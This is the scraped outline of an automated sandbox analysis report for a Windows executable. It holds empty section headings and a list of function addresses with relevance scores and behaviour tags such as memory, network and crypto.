File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 004019A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Function 022B7A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Function 00401E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 022B9A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 022B5988, Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Function 00401C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00401264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 00401703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 022B9BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Function 022B7C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150
timememoryCOMMON

Function 022BA85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Function 022BAC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 022B8E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 022B58DB, Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Function 022BA2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00401000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 022B2789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Function 022B97F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 022B1128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Function 022B2F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 022B2D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 00401D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Function 022B5319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Function 022B2C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Function 00401BAE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
memoryCOMMON

Function 004014AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 022B5B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Function 022B4A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Function 022B8B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Function 022B76E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 004013C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 022B5D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Function 022B831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 022B7EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 022B933A, Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Function 022B1037, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 0040136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 00401D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 022B7FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Function 022B8F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Function 00401752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 022B836E, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Function 022BB1E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 022BAFC0, Relevance: .1, Instructions: 77
COMMONCrypto